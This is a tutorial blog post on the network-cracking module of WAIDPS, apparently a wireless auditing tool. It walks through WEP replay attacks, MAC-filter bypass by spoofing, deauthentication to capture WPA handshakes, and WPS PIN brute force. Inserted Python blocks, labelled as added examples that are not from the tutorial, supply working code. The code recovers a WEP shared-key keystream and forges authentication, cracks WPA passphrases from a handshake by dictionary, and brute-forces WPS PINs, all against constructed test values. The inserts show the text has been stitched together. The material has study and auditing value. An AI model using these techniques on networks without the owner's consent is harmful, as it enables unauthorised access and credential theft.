Tuesday, June 24, 2014

WAIDPS [Wireless Auditing, Intrusion Detection & Prevention System] Tutorial / Explanations - Part 4


Network Cracking (Auditing) Module
WAIDPS also includes a Network Auditing module that allows the user to crack a WEP-encrypted access point (AP), capture the WPA/WPA2 4-way handshake for offline cracking of the WPA passphrase, and brute-force the PIN of a Wi-Fi Protected Setup (WPS) enabled router, which in turn reveals the WPA passphrase. Apart from cracking encrypted access points, WAIDPS also includes a "Live Monitoring" mode for an access point that shows details of the wireless clients associated with it.

WARNING : The Network Cracking Module is strictly for auditing your own network, or a network whose owner has given you explicit consent to audit it. It is ILLEGAL to attack someone else's access point, and it is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse of WAIDPS.

Network Auditing Main Menu
To get into the "Network Auditing" selection menu, press [Enter] on the main menu followed by [A]. The auditing menu lists the detected access points sorted in the order WEP, WPS-enabled routers, WPA access points with clients, and WPA access points without clients. To display more information on the available operations, type [Help].

Note : Allow the WiFi Harvester to collect access point and client details on the main screen before selecting the "Auditing Network" module; the auditing menu is built from what the harvester has already seen.

Cracking of WEP Encrypted Access Point
WAIDPS allows the user to crack a WEP-encrypted access point with several attack methods, such as ARP request replay, interactive ARP replay, and the KoreK and Hirte attacks (still in development). It also provides options to deauthenticate existing clients and to spoof the attacking MAC address. To select the target, enter the list number shown or the MAC address of the access point (BSSID). The list can also be filtered by encryption type by typing "WEP".


Once the target access point (AP) is selected, WAIDPS displays the current AP/client details together with any information about the AP that the "WiFi Harvester" previously stored in the database. WAIDPS has already spoofed the MAC address of the attacking interface at this point, and it also lets the user choose a different spoofed MAC address.

Once all settings are in place, WAIDPS first associates with the AP by performing a "fake authentication". After associating, it starts the default ARP Request Replay attack, which replays captured ARP requests so that the AP generates new IVs quickly. While the attack runs, WAIDPS repeatedly attempts to crack the WEP key once enough IVs have been collected (on the order of tens of thousands for a 104-bit key). Once the key is recovered, it is displayed and stored in the database for reference.

Example of displaying of cracked Access Point in the Auditing main menu

Apart from the default ARP Request Replay mode, WAIDPS provides other attack modes such as interactive packet replay, KoreK ChopChop, Caffe Latte, Fragmentation and Hirte (not ready yet). The user can enter the WEP Auditing Menu by pressing [Enter] during the attack. Besides the attack methods, the WEP auditing menu also allows the user to deauthenticate clients, spoof the attacking MAC address, and try other ways of cracking the WEP key.

Cracking of WEP Encrypted Access Point (Usage of previous captured IVs)
WAIDPS also stores previously captured IVs, so an attack that was interrupted before the key was recovered can be resumed later. The stored IVs are merged with the newly captured ones, so the total reaches the count needed for cracking sooner.

Cracking of WEP Encrypted Access Point (Beating MAC Filtered AP)
Some access points have MAC filtering enabled, which prevents unknown clients from associating and therefore makes the fake-authentication step fail. WAIDPS reports a possible "MAC Filtered Access Point" if the AP rejects the fake authentication in this way.

WAIDPS then offers to spoof the MAC address of an existing client, or of a client previously harvested into the database. Press [Enter] to display the WEP Auditing Menu and select "4" - Spoof MAC Address to change the attacking interface's MAC address. Because a legitimate client's MAC address is on the AP's allow list, reusing it gets the fake authentication through the filter.

Cracking of WEP Encrypted Access Point (Shared Key Authentication – SKA AP)
A WEP network using "Shared Key Authentication" (SKA) is harder to attack than the commonly used "Open" authentication WEP network, because the AP only accepts clients that can encrypt its challenge with the WEP key. WAIDPS reports a possible SKA WEP access point when the plain fake authentication fails. A legitimate client must authenticate while WAIDPS is listening so that the 140-byte keystream can be recovered (the client's encrypted challenge response XORed with the cleartext challenge); with that keystream WAIDPS can answer the AP's challenge itself without knowing the key. The user can manually send deauthentication frames to force a client to re-authenticate, or WAIDPS will do so automatically. To improve the chances of beating SKA, the user can also spoof an existing client's MAC address.
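To make the SKA step concrete, here is an added example (not WAIDPS code and not from this tutorial) of why one sniffed legitimate authentication is enough: the challenge text goes out in the clear in frame 2, frame 3 carries it WEP-encrypted with a known header and a computable CRC-32 ICV, and XORing the two recovers the RC4 keystream for that IV, which then answers a fresh challenge under the same IV. The WEP key, IV and challenge bytes are constructed test values, and the helper names (rc4, forge_auth3, ap_accepts) are the example's own.

```python
import struct
import zlib

# Constructed test data for this illustration (not from any real capture):
# a 104-bit WEP key, one 24-bit IV and two 128-byte challenge texts that
# stand in for the challenges an AP would send in SKA frame 2.
WEP_KEY = bytes.fromhex("0102030405060708090a0b0c0d")
IV = bytes.fromhex("112233")
CHALLENGE_1 = bytes(range(128))
CHALLENGE_2 = bytes((i * 7 + 3) & 0xFF for i in range(128))


def rc4(key, length):
    """First `length` keystream bytes of RC4 keyed with `key` (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def with_icv(plaintext):
    """WEP appends a little-endian CRC-32 integrity check value before encrypting."""
    return plaintext + struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key, iv, plaintext):
    """Encrypted frame body (the part after the IV/KeyID header): RC4(IV||key)."""
    data = with_icv(plaintext)
    return xor(data, rc4(iv + wep_key, len(data)))


def wep_decrypt(wep_key, iv, body):
    """Returns (plaintext, icv_ok)."""
    data = xor(body, rc4(iv + wep_key, len(body)))
    plaintext, icv = data[:-4], data[-4:]
    return plaintext, with_icv(plaintext)[-4:] == icv


def auth3_plaintext(challenge):
    """Body of SKA frame 3: algorithm=1 (shared key), sequence=3, status=0,
    then the Challenge Text element (id 16, length 128): 136 bytes."""
    return struct.pack("<HHHBB", 1, 3, 0, 16, len(challenge)) + challenge


def recover_ska_keystream(sniffed_challenge, sniffed_frame3_body):
    """Known plaintext (frame 2 challenge + fixed header + computable ICV)
    XOR ciphertext (frame 3 body) yields the RC4 keystream for that IV."""
    return xor(with_icv(auth3_plaintext(sniffed_challenge)), sniffed_frame3_body)


def forge_auth3(keystream, challenge):
    """Answer a new challenge without the key by reusing the keystream
    (and therefore the same IV it was recovered under)."""
    data = with_icv(auth3_plaintext(challenge))
    if len(keystream) < len(data):
        raise ValueError("need %d keystream bytes, have %d" % (len(data), len(keystream)))
    return xor(data, keystream)


def ap_accepts(wep_key, iv, frame3_body, challenge):
    """What the AP checks: the ICV must verify and the challenge must match."""
    plaintext, icv_ok = wep_decrypt(wep_key, iv, frame3_body)
    return icv_ok and plaintext == auth3_plaintext(challenge)


def demo():
    # 1. A legitimate client answers CHALLENGE_1 with the real key (sniffed).
    client_body = wep_encrypt(WEP_KEY, IV, auth3_plaintext(CHALLENGE_1))
    # 2. The attacker derives the 140-byte keystream from frames 2 and 3.
    keystream = recover_ska_keystream(CHALLENGE_1, client_body)
    # 3. The attacker starts its own SKA, receives CHALLENGE_2, and replies
    #    with the same IV and the recovered keystream; no key needed.
    forged = forge_auth3(keystream, CHALLENGE_2)
    return len(keystream), ap_accepts(WEP_KEY, IV, forged, CHALLENGE_2)


if __name__ == "__main__":
    print(demo())
```

The recovered keystream is only valid for the IV it was captured under, which is why the forged reply must reuse that IV; a client that never re-authenticates gives the attacker nothing to XOR against, which is what the deauthentication in this step is for.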

Cracking of WPA Encrypted Access Point
To crack a WPA/WPA2-encrypted access point, the user must first capture the 4-way handshake between a legitimate client and the AP. As with WEP cracking, WAIDPS displays the AP information and lets the user spoof the MAC address before proceeding to deauthenticate clients so that they reconnect and the handshake can be captured.

WAIDPS first sends broadcast deauthentication frames for the access point and watches for connected clients. Once a client is detected, WAIDPS sends deauthentication frames to that client's MAC address so that its reconnection produces a handshake. As with the WEP attack, the user can display the list of options by pressing [Enter] during the capture.

After the deauthentication frames are sent, WAIDPS detects handshakes and lists them individually by client MAC. Once a handshake is captured, the capture file is saved under the "/SYWorks/Saved/" directory, and WAIDPS proceeds to crack the WPA passphrase offline from the captured handshake.

If the passphrase is in the default dictionary, WAIDPS displays it and stores it in the database for reference. A handshake-based attack can only recover a passphrase that appears in the dictionary used; if the default dictionary fails, the saved handshake can be cracked again later with another dictionary.
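What "cracking the passphrase from the handshake" means in practice, as an added example (not WAIDPS code and not from this tutorial): for each candidate passphrase, derive the PMK with PBKDF2-HMAC-SHA1 over the SSID, expand the PTK with the two MAC addresses and the two nonces, and recompute the MIC over EAPOL-Key message 2 with the KCK; a matching MIC identifies the passphrase. The SSID, MAC addresses, nonces and the message 2 frame below are constructed stand-ins for what a real capture would contain, and the function names are the example's own.

```python
import hashlib
import hmac
import struct

# Constructed handshake parameters (not from a real capture). In a real audit
# these come from the beacon/probe (SSID), the 802.11 addresses, and EAPOL-Key
# messages 1 and 2 in the saved capture file.
SSID = b"auditlab"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes((i * 13 + 7) & 0xFF for i in range(32))
SNONCE = bytes((i * 29 + 3) & 0xFF for i in range(32))
KEY_VERSION = 2   # descriptor version: 1 = WPA/TKIP (HMAC-MD5 MIC), 2 = WPA2/CCMP (HMAC-SHA1-128 MIC)
MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes into the EAPOL-Key descriptor


def pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def ptk(pmk_, aa, spa, anonce, snonce):
    """PRF-512 'Pairwise key expansion' over the sorted MACs and sorted nonces.
    The first 16 bytes of the PTK are the KCK used for the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol, version):
    """MIC over the whole EAPOL frame with its MIC field zeroed; first 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def build_msg2(snonce, version, mic=b"\x00" * 16):
    """Minimal EAPOL-Key message 2 (no key data), laid out like a real one."""
    key_info = 0x0108 | version                    # Pairwise + MIC bits + descriptor version
    body = struct.pack(">BHH", 2, key_info, 16)    # descriptor type 2 (RSN), key info, key length
    body += b"\x00" * 7 + b"\x01"                  # replay counter = 1
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, RSC, key ID
    body += mic + b"\x00\x00"                      # MIC, key data length 0
    return struct.pack(">BBH", 2, 3, len(body)) + body   # EAPOL version 2, type 3 (Key)


def make_capture(passphrase):
    """Stand-in for the saved handshake: the MIC a real client would put in message 2."""
    kck = ptk(pmk(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, build_msg2(SNONCE, KEY_VERSION), KEY_VERSION)
    return {"ssid": SSID, "ap": AP_MAC, "client": CLIENT_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": build_msg2(SNONCE, KEY_VERSION, mic),
            "mic": mic, "version": KEY_VERSION}


def crack(capture, wordlist):
    """Dictionary attack: recompute the MIC for each candidate and compare.
    Returns the passphrase, or None if no candidate in the wordlist matches."""
    for word in wordlist:
        if not 8 <= len(word) <= 63:               # WPA passphrases are 8..63 characters
            continue
        kck = ptk(pmk(word.encode(), capture["ssid"]), capture["ap"], capture["client"],
                  capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"], capture["version"]), capture["mic"]):
            return word
    return None


if __name__ == "__main__":
    cap = make_capture(b"correct horse battery")
    print(crack(cap, ["password", "letmein", "short", "correct horse battery"]))
```

The 4096-iteration PBKDF2 step is the cost of each guess, which is why the attack is dictionary-driven rather than exhaustive and why WAIDPS keeps the handshake file so the same capture can be retried with a different wordlist.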


Cracking of WPA Encrypted Access Point (Manually selecting handshake file)
If a handshake has already been captured for an access point, "[Handshake]" is shown directly after the ESSID on the main auditing screen. The user can then select that access point to crack the saved handshake file manually with another dictionary.

Customising Dictionary Location
The user can specify the location of other dictionaries to use for cracking by typing "C" - Application Configuration on the WAIDPS main menu, then selecting "9" for Dictionary Detail and Setting.

Cracking of WPS Enabled Access Point
The WPS cracking option is only offered for WPA/WPA2-encrypted networks, since WEP is considered easy enough to crack directly. As with WEP/WPA cracking, the user selects the target by entering its list number or the MAC address of the AP (BSSID). Options are then offered to proceed with either "WPS Bruteforce" or "WPA handshake". Bruteforcing details are shown on screen so the user can follow the PINs tried, the PINs remaining, and the other status of the process.

Once the WPS PIN is found, WAIDPS displays the WPS PIN and the WPA passphrase of the cracked network and stores both in the database for reference.

Cracking of WPS Enabled Access Point (Manually entering PIN)
During the cracking process, the user can also enter a WPS PIN to try manually by pressing [Enter] to display the menu and then "P" to enter the PIN. This is particularly useful when the WPA passphrase has been changed but the WPS PIN has not: a valid PIN makes the AP hand over its current credentials, so the new passphrase is recovered without repeating the brute force.
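Why the status line shows "PINs remaining" in the thousands rather than the 10^8 an 8-digit PIN suggests, as an added example (not WAIDPS code and not from this tutorial): the eighth digit is a checksum of the first seven, and the registrar exchange confirms the first four digits (after M4) separately from the last four (after M6), so a split search needs at most 10,000 + 1,000 attempts. The same oracle also serves the manual-PIN path above. The simulated AP, its secret PIN and passphrase, and the function names are constructed for this example; a real attack exchanges M1..M7 over EAP-WSC with the AP.

```python
def wps_checksum(first_seven):
    """Checksum digit that becomes the 8th digit of a WPS PIN (the algorithm
    used by hostapd/wpa_supplicant): alternating weights 3 and 1, mod 10."""
    accum = 0
    pin = int(first_seven)
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def valid_pin(pin):
    """Syntactic check a client can do before sending anything over the air."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


class WpsAp:
    """Constructed stand-in for the AP's registrar side. The enrollee proves
    the first half of the PIN (PSK1) in M4 and the second half (PSK2) in M6;
    a NACK after either message tells the attacker which half was wrong.
    On success the AP returns its credentials (the WPA passphrase) in M7."""

    def __init__(self, pin, passphrase):
        self.pin, self.passphrase, self.attempts = pin, passphrase, 0

    def try_pin(self, pin):
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "M4_NACK", None
        if pin[4:] != self.pin[4:]:
            return "M6_NACK", None
        return "M7", self.passphrase


def manual_pin(ap, pin):
    """The 'enter PIN manually' path: refuse malformed PINs before sending."""
    if not valid_pin(pin):
        return "BAD_CHECKSUM", None
    return ap.try_pin(pin)


def bruteforce(ap):
    """Split search: up to 10^4 first halves, then up to 10^3 second halves
    (the checksum digit is fixed by the first seven). Returns
    (pin, passphrase, attempts); pin is None if the search fails."""
    first = None
    for i in range(10000):
        half = "%04d" % i
        status, _ = ap.try_pin(half + "000" + str(wps_checksum(half + "000")))
        if status != "M4_NACK":          # M6_NACK or M7: first half confirmed
            first = half
            break
    if first is None:
        return None, None, ap.attempts
    for j in range(1000):
        seven = first + "%03d" % j
        pin = seven + str(wps_checksum(seven))
        status, credential = ap.try_pin(pin)
        if status == "M7":
            return pin, credential, ap.attempts
    return None, None, ap.attempts


if __name__ == "__main__":
    target = WpsAp("12345670", "correct horse battery")   # constructed secret
    print(bruteforce(target))
    print(manual_pin(WpsAp("12345670", "new-passphrase"), "12345670"))
```

Real access points slow this down with lock-outs and rate limits, which is why the attack can take hours even though the keyspace is only 11,000; the "remaining PINs" counter in WAIDPS is counting down from that bound, not from 10^8.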

Live Monitoring of Access Point
WAIDPS also provides live monitoring of an access point, showing the activity status of the AP and of the wireless clients associated with it. It displays details of the detected devices and whether each is active or not sending any data. To monitor a specific access point, put an "M" in front of the listing number or in front of the BSSID.
